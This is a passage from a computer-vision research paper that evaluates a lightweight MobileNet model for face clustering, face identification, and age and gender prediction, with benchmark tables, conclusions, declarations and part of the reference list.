metrics were estimated with the Scikit-learn library: adjusted Rand index, adjusted mutual information, homogeneity, and completeness. In addition, the average number of extracted clusters K relative to the number of subjects C and the BCubed F-measure are computed. The latter metric is widely applied in various tasks of grouping faces (He et al., 2017; Zhang et al., 2016b). In the experiments the following testing data were used. � Subset of labeled faces in the wild (LFW) dataset (Learned-Miller et al., 2016), which was involved into the face identification protocol (Best-Rowden et al., 2014). C = 596 subjects who have at least two images in the LFW database and at least one video in the YouTube Faces (YTF) database (subjects in YTF are a subset of those in LFW) are used in all clustering methods. � Gallagher collection person dataset (Gallagher & Chen, 2008), which contains 931 labeled faces with C = 32 identities in each of the 589 images. As only eyes positions are available in this dataset, I preliminarily detect faces using MTCNN (Zhang et al., 2016a) and chose the subject with the largest intersection of facial region with given eyes region. If the face is not detected, a square region with the size chosen as a 1.5-times distance between eyes is extracted. � Grouping faces in the wild (GFW) (He et al., 2017) with preliminarily detected facial images from 60 real users’ albums from a Chinese social network portal. The size of an album varies from 120 to 3,600 faces, with a maximum number of identities of C = 321. Savchenko (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.197 11/26 http://dx.doi.org/10.7717/peerj-cs.197 https://peerj.com/computer-science/ The average values of clustering performance metrics are presented in Tables 1–3 for LFW, Gallagher, and GFW datasets, respectively. The average linkage is the best method according to most of the metrics of cluster analysis. The usage of the rank-order distance (Zhu, Wen & Sun, 2011) is not appropriate due to rather low performance. Moreover, this distance requires an additional threshold parameter for the cluster-level rank-order distance. Finally, the computational complexity of such clustering is three to four times higher when compared to other hierarchical agglomerative clustering methods. One of the most important conclusion here is that the trained MobileNet (Fig. 1) is in most cases more accurate than the widely used VGGFace. As expected, the quality of the proposed model is slightly lower when compared to the deep ResNet-50 ConvNet trained on the same VGGFace2 dataset. Surprisingly, the highest BCubed F-measure for the most complex GFW dataset (0.751) is achieved by the proposed model. This value is slightly higher than the best BCubed F-measure (0.745) reported in the original paper (He et al., 2017). However, the most important advantages of the proposed model from the practical point of view are excellent run-time/space complexity. For example, the inference in the proposed model is 5–10-times faster when compared to the VGGFace and VGGFace2. Moreover, the dimensionality of the feature vector is two to four times lower leading to the faster computation of a distance matrix in a clustering method. In addition, the proposed model makes it possible to simultaneously predict age and gender of observed facial image. Table 1 Clustering results, LFW subset (C = 596 subjects). K/C ARI AMI Homogeneity Completeness F-measure Single VGGFace 1.85 0.884 0.862 0.966 0.939 0.860 VGGFace2 1.22 0.993 0.969 0.995 0.986 0.967 Proposed model 2.00 0.983 0.851 0.998 0.935 0.880 Average VGGFace 1.17 0.980 0.937 0.985 0.971 0.950 VGGFace2 1.06 0.997 0.987 0.998 0.994 0.987 Proposed model 1.11 0.995 0.971 0.993 0.987 0.966 Complete VGGFace 0.88 0.616 0.848 0.962 0.929 0.823 VGGFace2 0.91 0.760 0.952 0.986 0.978 0.932 Proposed model 0.81 0.987 0.929 0.966 0.986 0.916 Weighted VGGFace 1.08 0.938 0.928 0.979 0.967 0.915 VGGFace2 1.08 0.997 0.982 0.998 0.992 0.983 Proposed model 1.08 0.969 0.959 0.990 0.981 0.986 Median VGGFace 2.84 0.827 0.674 0.987 0.864 0.751 VGGFace2 1.42 0.988 0.938 0.997 0.972 0.947 Proposed model 2.73 0.932 0.724 0.999 0.884 0.791 Rank-order VGGFace 0.84 0.786 0.812 0.955 0.915 0.842 VGGFace2 0.98 0.712 0.791 0.989 0.907 0.888 Proposed model 0.86 0.766 0.810 0.962 0.915 0.863 Note: The best results in each column are marked in bold. Savchenko (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.197 12/26 http://dx.doi.org/10.7717/peerj-cs.197 https://peerj.com/computer-science/ Table 2 Clustering results, Gallagher dataset (C = 32 subjects). K/C ARI AMI Homogeneity Completeness F-measure Single VGGFace 9.13 0.601 0.435 0.966 0.555 0.662 VGGFace2 2.75 0.270 0.488 0.554 0.778 0.637 Proposed model 12.84 0.398 0.298 1.000 0.463 0.482 Average VGGFace 1.84 0.858 0.792 0.916 0.817 0.874 VGGFace2 2.94 0.845 0.742 0.969 0.778 0.869 Proposed model 2.03 0.890 0.809 0.962 0.832 0.897 Complete VGGFace 1.31 0.571 0.624 0.886 0.663 0.706 VGGFace2 0.94 0.816 0.855 0.890 0.869 0.868 Proposed model 1.47 0.644 0.649 0.921 0.687 0.719 Weighted VGGFace 0.97 0.782 0.775 0.795 0.839 0.838 VGGFace2 1.63 0.607 0.730 0.876 0.760 0.763 Proposed model 1.88 0.676 0.701 0.952 0.735 0.774 Median VGGFace 9.16 0.613 0.433 0.942 0.555 0.663 VGGFace2 4.41 0.844 0.715 0.948 0.761 0.860 Proposed model 12.38 0.439 0.324 0.960 0.482 0.531 Rank-order VGGFace 1.59 0.616 0.488 0.902 0.582 0.702 VGGFace2 1.94 0.605 0.463 0.961 0.566 0.682 Proposed model 3.06 0.249 0.251 0.986 0.424 0.398 Note: The best results in each column are marked in bold. Table 3 Clustering results, GFW dataset (in average, C = 46 subjects). K/C ARI AMI Homogeneity Completeness F-measure Single VGGFace 4.10 0.440 0.419 0.912 0.647 0.616 VGGFace2 3.21 0.580 0.544 0.942 0.709 0.707 Proposed model 4.19 0.492 0.441 0.961 0.655 0.636 Average VGGFace 1.42 0.565 0.632 0.860 0.751 0.713 VGGFace2 1.59 0.603 0.663 0.934 0.761 0.746 Proposed model 1.59 0.609 0.658 0.917 0.762 0.751 Complete VGGFace 0.95 0.376 0.553 0.811 0.690 0.595 VGGFace2 1.44 0.392 0.570 0.916 0.696 0.641 Proposed model 1.28 0.381 0.564 0.886 0.693 0.626 Weighted VGGFace 1.20 0.464 0.597 0.839 0.726 0.662 VGGFace2 1.05 0.536 0.656 0.867 0.762 0.710 Proposed model 1.57 0.487 0.612 0.915 0.727 0.697 Median VGGFace 5.30 0.309 0.307 0.929 0.587 0.516 VGGFace2 4.20 0.412 0.422 0.929 0.639 0.742 Proposed model 6.86 0.220 0.222 0.994 0.552 0.411 Rank-order VGGFace 0.82 0.319 0.430 0.650 0.694 0.630 VGGFace2 1.53 0.367 0.471 0.937 0.649 0.641 Proposed model 1.26 0.379 0.483 0.914 0.658 0.652 Note: The best results in each column are marked in bold. Savchenko (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.197 13/26 http://dx.doi.org/10.7717/peerj-cs.197 https://peerj.com/computer-science/ Though the main purpose of this paper is face grouping in unsupervised environment, it is important to analyze the quality of face identification of the proposed model. Thus, in the last experiment of this subsection I deal with the LFW dataset (Learned- Miller et al., 2016) and PubFig83 dataset (Pinto et al., 2011). I took 9,164 photos of 1,680 persons from LFW with more than one photo. All 13,811 photos of C = 83 identities from PubFig83 were considered. The datasets are divided randomly 10 times into the training and testing sets, so that the ratio of the size R of the training set to the size of the whole dataset is equal to a fixed number. The rank-1 accuracy of the k-NN classifier for the proposed model in comparison with the state-of-the-art results for 50–50 train/test split of the LFW is shown in Table 4. The results of the 10-times repeated random sub-sampling cross validation of the k-NN classifier (Savchenko, 2018) for several publicly available ConvNets in dependence of the number of photos of each subject are presented in Table 5. Here the model size of each ConvNet and average inference time on CPU of MacBook Pro 2015 (16 GB RAM, Intel Core i7 2.2 GHz) are additionally presented. Here one could notice that the proposed simple network provides competitive results with the state-of-the-art solutions though its size is approximately 6.5-times lower than the Table 4 Rank-1 accuracy (%) in face identification for LFW dataset. ConvNet Rank-1 accuracy COTS-s1+s4 (Best-Rowden et al., 2014) 66.5 DeepFace (Taigman et al., 2014) 64.9 VGGFace (VGGNet-16) (Parkhi, Vedaldi & Zisserman, 2015) 87.35 ArcFace (Deng et al., 2019) 92.56 VIPLFaceNetFull (Liu et al., 2017a) 92.79 Light CNN (C) (Wu et al., 2018) 93.8 DeepID2+ (Sun et al., 2014) 95.0 DeepID3 (Sun et al., 2015) 96.0 IDL ensemble (Liu et al., 2015) 98.03 FaceNet (InceptionResNet+softmax loss) (Schroff, Kalenichenko & Philbin, 2015) 97.72 VGGFace2 (ResNet-50) (Cao et al., 2018) 98.78 Proposed model 94.81 Table 5 Results of face identification for PubFig83 dataset. ConvNet Rank-1 accuracy (%) Model size (MB) Inference time (ms) Number of photos per subject 5 15 30 Light CNN (C) 88.5 ± 0.9 92.9 ± 0.9 94.5 ± 0.2 21.9 39.6 VGGFace (VGGNet-16) 87.2 ± 1.0 94.5 ± 0.1 95.6 ± 0.0 552.6 186.8 VGGFace2 (ResNet-50) 97.0 ± 0.2 98.8 ± 0.0 99.0 ± 0.1 89.9 112.1 Proposed model 89.3 ± 0.8 96.2 ± 0.1 97.5 ± 0.1 13.5 29.1 Savchenko (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.197 14/26 http://dx.doi.org/10.7717/peerj-cs.197 https://peerj.com/computer-science/ size of the deep ResNet-50 trained on VGGFace2 dataset (Cao et al., 2018). The inference time in the MobileNet is also known to be much lower. Age and gender recognition In this subsection, the proposed model is compared with publicly available ConvNets for age/gender prediction: � Deep expectation (DEX) VGG16 network trained on the IMDB-Wiki dataset (Rothe, Timofte & Van Gool, 2015) � Wide ResNet (Zagoruyko & Komodakis, 2016) (weights.28-3.73) (https://github.com/ yu4u/age-gender-estimation) � Wide ResNet (weights.18-4.06) (https://github.com/Tony607/Keras_age_gender) � FaceNet (Schroff, Kalenichenko & Philbin, 2015) (https://github.com/BoyuanJiang/Age- Gender-Estimate-TF) � BKNetStyle2 (https://github.com/truongnmt/multi-task-learning) � SSRNet (Yang et al., 2018) (https://github.com/shamangary/SSR-Net) � MobileNet v2 (Agegendernet) (https://github.com/dandynaufaldi/Agendernet) � Two models from InsightFace (Deng et al., 2019): original ResNet-50 and “new” fast ConvNet (https://github.com/deepinsight/InsightFace/) � Inception v3 (https://github.com/dpressel/rude-carnie) fine-tuned on the Adience dataset (Eidinger, Enbar & Hassner, 2014) � Age_net/gender_net (Levi & Hassner, 2015) trained on the Adience dataset (Eidinger, Enbar & Hassner, 2014). In contrast to the proposed approach, all these models have been trained only on specific datasets with age and gender labels, that is, they are fine-tuned from traditional ConvNets pre-trained on ImageNet-1000 and do not use large-scale face recognition datasets. In addition, several special cases of the MobileNet-based model (Fig. 1) were examined. Firstly, I compressed this model using standard Tensorflow quantization graph transforms. Secondly, all layers of the proposed model were fine-tuned for age and gender predictions (hereinafter “Proposed MobileNet, fine-tuned”). Though such tuning obviously reduce the accuracy of face identification with identity features at the output of the base MobileNet, it caused an above-mentioned increase of validation accuracies for gender and age classification Thirdly, in order to compare the proposed multi-output neural network (Fig. 1) with conventional approach, I additionally used the same MobileNet-based network but with a single head, which was pre-trained on the same VGGFace2 face recognition problem and then fine-tuned for one task (age or gender recognition), that is, there are two different models (hereinafter “MobileNet with single head”) for all these tasks. Finally, it was decided to measure the influence of pre-training on face recognition task. Hence, the model (Fig. 1) was fine-tuned using the above- mentioned procedure and the same training set with labeled age and gender, but the base Savchenko (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.197 15/26 https://github.com/yu4u/age-gender-estimation https://github.com/yu4u/age-gender-estimation https://github.com/Tony607/Keras_age_gender https://github.com/BoyuanJiang/Age-Gender-Estimate-TF https://github.com/BoyuanJiang/Age-Gender-Estimate-TF https://github.com/truongnmt/multi-task-learning https://github.com/shamangary/SSR-Net https://github.com/dandynaufaldi/Agendernet https://github.com/deepinsight/InsightFace/ https://github.com/dpressel/rude-carnie http://dx.doi.org/10.7717/peerj-cs.197 https://peerj.com/computer-science/ MobileNet was pre-trained on conventional ImageNet-1000 dataset rather than on VGGFace2 (Cao et al., 2018). Though such network (hereinafter “Proposed MobileNet, fine-tuned from ImageNet”) cannot be used in facial clustering, it can be applied in gender and age prediction tasks. I run the experiments on the MSI GP63 8RE laptop (CPU: 4xIntel Core i7 2.2 GHz, RAM: 16 GB, GPU: nVidia GeForce GTX 1060) and two mobile phones, namely: (1) Honor 6C Pro (CPU: MT6750 4�1 GHz and 4�2.5 GHz, RAM: 3 GB); and (2) Samsung S9+ (CPU: 4�2.7 GHz Mongoose M3 and 4�1.8 GHz Cortex-A55, RAM: 6 GB). The size of the model file and average inference time for one facial image are presented in Table 6. As expected, the MobileNets are several times faster than the deeper convolutional networks and require less memory to store their weights. Though the quantization reduces the model size in four times, it does not decrease the inference time. Finally, though the computing time for the laptop is significantly lower when compared to the inference on mobile phones, their modern models (“Mobile phone 2”) became all the more suitable for offline image recognition. In fact, the proposed model requires only 60–70 ms to extract facial identity features and predict both age and gender, which makes it possible to run complex analytics of facial albums on device. In the next experiments the accuracy of the proposed models were estimated in gender recognition and age prediction tasks. At first, I deal with University of Tennessee, Knoxville Face Dataset (UTKFace) (Zhang, Song & Qi, 2017). The images from complete (“In the Wild”) set were pre-processed using the following procedure from the above-mentioned Agegendernet resource (https://github.com/dandynaufaldi/ Agendernet): faces are detected and aligned with margin 0.4 using get_face_chip function from DLib. Next, all images which has no single face detected, are removed. The rest 23,060 images are scaled to the same size 224�224. In order to estimate the accuracy of age prediction, eight age ranges from the Adience dataset (Eidinger, Enbar & Hassner, 2014) were used. If the predicted and real age are included into the same range, then the recognition is assumed to be correct. The results are shown in Table 7. In contrast to the previous experiment (Table 6), here the inference time is measured on the laptop’s GPU. In this experiment the proposed ConvNets (three last lines in Table 7) have higher accuracy of age/gender recognition when compared to the available models trained only on specific datasets, for example, IMDB-Wiki or Adience. For example, the best fine-tuned MobileNet provided 2.5–40% higher accuracy of gender classification. The gain in age prediction performance is even more noticeable: I obtain 1.5–10 years less MAE (mean Table 6 Performance analysis of ConvNets. ConvNet Model size (MB) Average CPU inference time (ms) Laptop Mobile phone 1 Mobile phone 2 age_net/gender_net 43.75 91 1,082 224 DEX 513.82 210 2,730 745 Proposed MobileNet 13.78 21 354 69 Proposed MobileNet, quantized 3.41 19 388 61 Savchenko (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.197 16/26 https://github.com/dandynaufaldi/Agendernet https://github.com/dandynaufaldi/Agendernet http://dx.doi.org/10.7717/peerj-cs.197 https://peerj.com/computer-science/ absolute error) and 10–40% higher accuracy. Though the gender recognition accuracy of a ConvNet with single head is rather high, multi-task learning causes a noticeable decrease in age prediction quality (up to 0.5% and 4.5% differences in MAE accuracy). Hence, the proposed approach is definitely more preferable if both age and gender recognition tasks are solved due to the twice-lower running time when compared to the usage of separate age and gender networks. It is interesting that though there exist models with lower size, for example, SSRNet (Yang et al., 2018) or new InsightFace-based model (Deng et al., 2019), the proposed ConvNet provides the fastest inference, which can be explained by special optimization of hardware for such widely used architectures as MobileNet. It is known that various image preprocessing algorithms could drastically influence the recognition performance. Hence, in the next experiment conventional set of all 23,708 images from “Aligned & cropped faces” provided by the authors of the UTKFace was used. The results of the same models are presented in Table 8. The difference in image pre-processing causes significant decrease of the accuracies of most models. For example, the best proposed model in this experiment has 14–40% and 5–40% higher age and gender recognition accuracy, respectively. Its age prediction MAE is at least 2.5 years lower when compared to the best publicly available model from Insight face. The usage of the same DLib library to detect and align faces in a way, which is only slightly different from the above-mentioned preprocessing pipeline, drastically decreases the accuracy of the best existing model from previous experiment (MobileNet v2) up to 5.5% gender accuracy and 3 years in age prediction MAE. Obviously, such dependence of performance on the image pre-processing algorithm makes the model inappropriate for practical applications. Hence, this experiment clearly demonstrates how Table 7 Age and gender recognition results for preprocessed UTKFace (in the wild) dataset. Models Gender accuracy (%) Age MAE Age accuracy (%) Model size (Mb) Inference time (ms) DEX 91.05 6.48 51.77 1,050.5 47.1 Wide ResNet (weights.28-3.73) 88.12 9.07 46.27 191.2 10.5 Wide ResNet (weights.18-4.06) 85.35 10.05 43.23 191.2 10.5 FaceNet 89.54 8.58 49.02 89.1 20.3 BKNetStyle2 57.76 15.94 23.49 29.1 12.5 SSRNet 85.69 11.90 34.86 0.6 6.6 MobileNet v2 (Agegendernet) 91.47 7.29 53.30 28.4 11.4 ResNet-50 from InsightFace 87.52 8.57 48.92 240.7 25.3 “New” model from InsightFace 84.69 8.44 48.41 1.1 5.1 Inception trained on Adience 71.77 – 32.09 85.4 37.7 age_net/gender_net 87.32 – 45.07 87.5 8.6 MobileNets with single head 93.59 5.94 60.29 25.7 7.2 Proposed MobileNet, fine-tuned from ImageNet 91.81 5.88 58.47 13.8 4.7 Proposed MobileNet, pre-trained on VGGFace2 93.79 5.74 62.67 13.8 4.7 Proposed MobileNet, fine-tuned 94.10 5.44 63.97 13.8 4.7 Savchenko (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.197 17/26 http://dx.doi.org/10.7717/peerj-cs.197 https://peerj.com/computer-science/ the proposed model exploits the potential of very large face recognition dataset to learn face representation in contrast to the training only on rather small and dirty datasets with age and gender labels. It is important to emphasize that the same statement is valid even for the proposed model (Fig. 1). In particular, the usage of face identification features pre-trained on VGGFace2 leads to 3.5% and 6.5% lower error rate of age and gender classification, respectively, when compared to conventional fine-tuning of MobileNet, which has been preliminarily trained on ImageNet-1000 only (third last line in Table 8). This difference in error rates is much more noticeable when compared to the previous experiment (Table 7), especially for age prediction MAE. Many recent papers devoted to UTKFace dataset split it into the training and testing sets and fine-tune the models on such training set (Das, Dantcheva & Bremond, 2018). Though the proposed ConvNet does not require such fine-tuning, its results are still very competitive. For example, I used the testing set described in the paper (Cao, Mirjalili & Raschka, 2019), which achieves the-state-of-the-art results on a subset of UTKFace if only 3,287 photos of persons from the age ranges are taken into the testing set. The proposed model achieves 97.5% gender recognition accuracy and age prediction MAE 5.39. It is lower than 5.47 MAE of the best CORAL-CNN model from this paper, which was additionally trained on other subset of UTKFace. As the age and gender recognition is performed in the proposed pipeline (Fig. 2) for a set of facial images in a cluster, it was decided to use the known video datasets with age/gender labels in the next experiments in order to test performance of classification of a set of video frames (Kharchevnikova & Savchenko, 2018): � Eurecom Kinect (Min, Kose & Dugelay, 2014), which contains nine photos for each of 52 subjects (14 women and 38 men). Table 8 Age and gender recognition results for UTKFace (aligned and cropped faces) dataset. Models Gender accuracy (%) Age MAE Age accuracy (%) DEX 83.16 9.84 41.22 Wide ResNet (weights.28-3.73) 73.01 14.07 29.32 Wide ResNet (weights.18-4.06) 69.34 13.57 37.23 FaceNet 86.14 9.60 44.70 BKNetStyle2 60.93 15.36 21.63 SSRNet 72.29 14.18 30.56 MobileNet v2 (Agegendernet) 86.12 11.21 42.02 ResNet-50 from InsightFace 81.15 9.53 45.30 “New” model from InsightFace 80.55 8.51 48.53 Inception trained on Adience 65.89 – 27.01 age_net/gender_net 82.36 – 34.18 MobileNets with single head 91.89 6.73 57.21 Proposed MobileNet, fine-tuned from ImageNet 84.30 7.24 58.05 Proposed MobileNet, pre-trained on VGGFace2 91.95 6.00 61.70 Proposed MobileNet, fine-tuned 91.95 5.96 62.74 Savchenko (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.197 18/26 http://dx.doi.org/10.7717/peerj-cs.197 https://peerj.com/computer-science/ � Indian movie face database (IMFDB) (Setty et al., 2013) with 332 video clips of 63 males and 33 females. Only four age categories are available: “Child” (0–15 years old), “Young” (16–35), “Middle”: (36–60), and “Old” (60+). � Acted facial expressions in the wild (AFEW) from the EmotiW 2018 (Emotions recognition in the wild) audio–video emotional sub-challenge (Klare et al., 2015). It contains 1,165 video files. The facial regions were detected using the MTCNN (Zhang et al., 2016a). � IARPA Janus Benchmark A (Dhall et al., 2012) with more than 13,000 total frames of 1,165 video tracks. Only gender information is available in this dataset. In video-based gender recognition a gender of a person on each video frame is firstly classified. After that two simple fusion strategies are utilized, namely, simple voting, and the product rule (2). The obtained accuracies of the proposed models compared to most widely used DEX (Rothe, Timofte & Van Gool, 2015) and gender_net/age_net (Levi & Hassner, 2015) are shown in Table 9. Here again the proposed models are much more accurate than the publicly available ConvNets trained only on rather small and dirty datasets with age/gender labels. It is important to emphasize that the gender output of the proposed network was trained on the same IMDB-Wiki dataset as the DEX network (Rothe, Timofte & Van Gool, 2015). However, the error rate in the proposed approach is much lower when compared to the DEX. It can be explained by the pre-training of the base MobileNet on face identification task with very large dataset, which helps to learn rather good facial representations. Such pre-training differs from traditional usage of ImageNet weights and only fine-tune the CNN on a specific dataset with known age and gender labels. Secondly, the usage of product rule generally leads to 1–2% decrease of the error rate when compared to the simple voting. Thirdly, the fine-tuned version of the proposed model achieves the lowest error rate only for the Kinect dataset and is 1–3% less accurate in other cases. It is worth noting that the best accuracy for Eurecom Kinect dataset is 7% higher than the best-known accuracy (87.82%) achieved by Huynh, Min & Dugelay (2012) in similar settings without analysis of depth images. Fourthly, though the compression of the ConvNet makes it possible to drastically reduce the model size (Table 6), it is characterized by up to 7% decrease of the recognition rate. Finally, conventional single-output model is slightly less accurate than the proposed network, though the difference in the error rate is not statistically significant. In the last experiment the results for age predictions are presented (Table 10). As the training set for the proposed network differs with conventional DEX model due to addition of the Adience data to the IMDB-Wiki dataset, it was decided to repeat training of the proposed network (Fig. 1) with the IMDB-Wiki data only. Hence, the resulted “Proposed MobileNet, IMDB-Wiki only” ConvNet is more fairly compared with the DEX network. Here it was assumed that age is recognized correctly for the Kinect and AFEW datasets (with known age) if the difference between real and predicted age is not greater than 5 years. The fusion of age predictions of individual video frames is implemented Savchenko (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.197 19/26 http://dx.doi.org/10.7717/peerj-cs.197 https://peerj.com/computer-science/ Table 10 Video-based age prediction accuracy, %. ConvNet Aggregation Eurecom Kinect IMFDB AFEW age_net Simple voting 41 68 27 Product rule 45 48 27 Expected value 69 32 30 DEX Simple voting 60 29 47 Product rule 71 29 48 Expected value 71 54 52 MobileNet with single head Simple voting 91 34 46 Product rule 93 38 47 Expected value 94 75 54 Proposed MobileNet, IMDB-Wiki only Simple voting 73 30 47 Product rule 83 31 47 Expected value 85 58 52 Proposed MobileNet, IMDB-Wiki+Adience Simple voting 92 32 46 Product rule 94 36 46 Expected value 94 77 54 Proposed MobileNet, quantized Simple voting 86 34 44 Product rule 88 36 46 Expected value 85 58 50 Proposed MobileNet, fine-tuned Simple voting 74 33 45 Product rule 77 35 45 Expected value 92 72 51 Note: The highest accuracies for each dataset are marked by bold. Table 9 Video-based gender recognition accuracy, %. ConvNet Aggregation Eurecom Kinect IMFDB AFEW IJB-A gender_net Simple voting 73 71 75 60 Product rule 77 75 75 59 DEX Simple Voting 84 81 80 81 Product rule 84 88 81 82 MobileNet with single head Simple voting 93 97 92 95 Product rule 93 98 93 95 Proposed MobileNet Simple voting 94 98 93 95 Product rule 93 99 93 96 Proposed MobileNet, quantized Simple voting 88 96 92 93 Product rule 86 96 93 94 Proposed MobileNet, fine-tuned Simple voting 93 95 91 94 Product rule 95 97 92 95 Note: The highest accuracies for each dataset are marked by bold. Savchenko (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.197 20/26 http://dx.doi.org/10.7717/peerj-cs.197 https://peerj.com/computer-science/ by: (1) simple voting, (2) maximizing the product of age posterior probabilities (2), and (3) averaging the expected value (3) with choice of L = 3 top predictions in each frame. One can notice that the proposed models are again the most accurate in practically all cases. The accuracy of the DEX models are comparable with the proposed ConvNets only for the AFEW dataset. This gain in the error rate cannot be explained by using additional Adience data, as it is noticed even for the “Proposed MobileNet, IMDB-Wiki only” model. Secondly, the lowest error rates are obtained for the computation of the expected value of age predictions. For example, it is 2% and 8% more accurate than the simple voting for the Kinect and AFEW data. The effect is especially clear for the IMFDB images, in which the expected value leads to up to 45% higher recognition rate. CONCLUSIONS In this paper I proposed an approach to organizing photo and video albums (Fig. 2) based on a simple extension of MobileNet (Fig. 1), in which the facial representations suitable for face identification, age, and gender recognition problems are extracted. The main advantage of the proposed model is the possibility to solve all three tasks simultaneously without need for additional ConvNets. As a result, a very fast facial analytic system was implemented (Table 6), which can be installed even on mobile devices (Fig. 3). It was shown that the proposed approach extracts facial clusters rather accurately when compared to the known models (Tables 1 and 2). Moreover, the known state-of-the-art BCubed F-measure for very complex GFW data was slightly improved (Table 3). More importantly, the results for age and gender predictions using extracted facial representations significantly outperform the results of the publicly available neural networks (Tables 9 and 10). The state-of-the-art results on the whole UTKFace dataset (Zhang, Song & Qi, 2017) was achieved (94.1% gender recognition accuracy, 5.44 age prediction MAE) for the ConvNets which are not fine-tuned on a part of this dataset. The proposed approach does not have the limitations of existing methods of simultaneous face analysis (Ranjan, Patel & Chellappa, 2017; Yoo et al., 2018) for usage in face identification and clustering tasks because it firstly learns the facial representations using external very large face recognition dataset. The proposed approach is usable even for face identification with small training samples, including the most complex case, namely, a single photo per individual. Furthermore, the method enables to apply the ConvNet in completely unsupervised environments for face clustering, given only a set of photos from a mobile device. Finally, the training procedure to learn parameters of the method alternately trains all the facial attribute recognition tasks using batches of different training images. Hence, the training images are not required to have all attributes available. As a result, much more complex (but still fast) network architectures can be trained when compared to the ConvNet of (Yoo et al., 2018) and, hence, achieve very high age/gender recognition accuracy and the face clustering quality comparable to very deep state-of-the-art ConvNets. In future works it is necessary to deal with the aging problem. In fact, the average linkage clustering usually produces several groups for the same person (especially, a child). Savchenko (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.197 21/26 http://dx.doi.org/10.7717/peerj-cs.197 https://peerj.com/computer-science/ The single linkage clustering can resolve this issue if there are photos of the same subject made over the years. Unfortunately, the performance of the single linkage is rather poor when compared to another agglomerative clustering methods (Tables 1–3). An additional research direction is a thorough analysis of distance measures in the facial clustering (Zhu, Wen & Sun, 2011); that is, the usage of distance learning (Zhu et al., 2013) or special regularizers (Savchenko & Belova, 2018). It is also important to extend the proposed approach to classify other facial attributes, for example, race/ethnicity (Zhang, Song & Qi, 2017) or emotions (Rassadin, Gruzdev & Savchenko, 2017). Finally, though the main purpose of this paper was to provide an efficient ConvNet suitable for multiple tasks including extraction of good face representations, the quality of grouping faces could be obviously improved by replacement of agglomerative clustering to contemporary clustering techniques with unknown number of clusters (He et al., 2017; Zhang et al., 2016b; Shi, Otto & Jain, 2018; Vascon et al., 2013). ADDITIONAL INFORMATION AND DECLARATIONS Funding This research was supported by Samsung Research and Samsung Electronics. Additionally, this research was prepared within the framework of the Basic Research Program at the National Research University Higher School of Economics (HSE) in return for lab time. There was no additional external funding received for this study. The funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. Grant Disclosures The following grant information was disclosed by the authors: Samsung Research and Samsung Electronics. Basic Research Program at the National Research University Higher School of Economics. Competing Interests Andrey V. Savchenko is an employee of the Samsung-PDMI Joint AI Center, St. Petersburg Department of Steklov Institute of Mathematics Russian Academy of Sciences and of the National Research University Higher School of Economics. Author Contributions � Andrey V. Savchenko conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. Data Availability The following information was supplied regarding data availability: Source code and neural network models are publicly available at GitHub: https://github.com/HSE-asavchenko/HSE_FaceRec_tf/tree/master/age_gender_identity. Savchenko (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.197 22/26 https://github.com/HSE-asavchenko/HSE_FaceRec_tf/tree/master/age_gender_identity http://dx.doi.org/10.7717/peerj-cs.197 https://peerj.com/computer-science/ REFERENCES Aggarwal CC, Reddy CK. 2013. Data clustering: algorithms and applications. Boca Raton: CRC press. Antipov G, Baccouche M, Berrani S-A, Dugelay J-L. 2017. Effective training of convolutional neural networks for face-based gender and age prediction. Pattern Recognition 72:15–26 DOI 10.1016/j.patcog.2017.06.031. Best-Rowden L, Han H, Otto C, Klare BF, Jain AK. 2014. Unconstrained face recognition: identifying a person of interest from a media collection. IEEE Transactions on Information Forensics and Security 9(12):2144–2157 DOI 10.1109/tifs.2014.2359577. Cao W, Mirjalili V, Raschka S. 2019. Consistent rank logits for ordinal regression with convolutional neural networks. arXiv Available at http://arxiv.org/abs/1901.07884. Cao Q, Shen L, Xie W, Parkhi OM, Zisserman A. 2018. VGGFace2: a dataset for recognising faces across pose and age. In: Proceedings of the International Conference on Automatic Face & Gesture Recognition (FG 2018). Piscataway: IEEE, 67–74. Choi SE, Lee YJ, Lee SJ, Park KR, Kim J. 2011. Age estimation using a hierarchical classifier based on global and local facial features. Pattern Recognition 44(6):1262–1281 DOI 10.1016/j.patcog.2010.12.005. Crosswhite N, Byrne J, Stauffer C, Parkhi O, Cao Q, Zisserman A. 2017. Template adaptation for face verification and identification. In: Proceedings of the International Conference on Automatic Face & Gesture Recognition (FG 2017). Piscataway: IEEE, 1–8. Das A, Dantcheva A, Bremond F. 2018. Mitigating bias in gender, age and ethnicity classification: a multi-task convolution neural network approach. In: European Conference on Computer Vision. Munich: Springer, 573–585. Deng J, Guo J, Niannan X, Zafeiriou S. 2019. Arcface: additive angular margin loss for deep face recognition. In: Proceedings of the IEEE Conference on Computer Vision and Pattern Recognition (CVPR). Piscataway: IEEE. Dhall A, Goecke R, Lucey S, Gedeon T. 2012. Collecting large, richly annotated facial-expression databases from movies. IEEE Multimedia 19(3):34–41 DOI 10.1109/mmul.2012.26. Eidinger E, Enbar R, Hassner T. 2014. Age and gender estimation of unfiltered faces. IEEE Transactions on Information Forensics and Security 9(12):2170–2179 DOI 10.1109/tifs.2014.2359646. Gallagher AC, Chen T. 2008. Clothing cosegmentation for recognizing people. In: Proceedings of the International Conference on Computer Vision and Pattern Recognition (CVPR). Piscataway: IEEE, 1–8. Goodfellow I, Bengio Y, Courville A. 2016. Deep learning. Cambridge, London: MIT Press. Guo Y, Zhang L. 2017. One-shot face recognition by promoting underrepresented classes. Available at http://arxiv.org/abs/1707.05574. Han H, Jain AK, Wang F, Shan S, Chen X. 2018. Heterogeneous face attribute estimation: a deep multi-task learning approach. IEEE Transactions on Pattern Analysis and Machine Intelligence 40(11):2597–2609 DOI 10.1109/tpami.2017.2738004. He Y, Cao K, Li C, Loy CC. 2017. Merge or not? Learning to group faces via imitation learning. Available at http://arxiv.org/abs/1707.03986. Howard AG, Zhu M, Chen B, 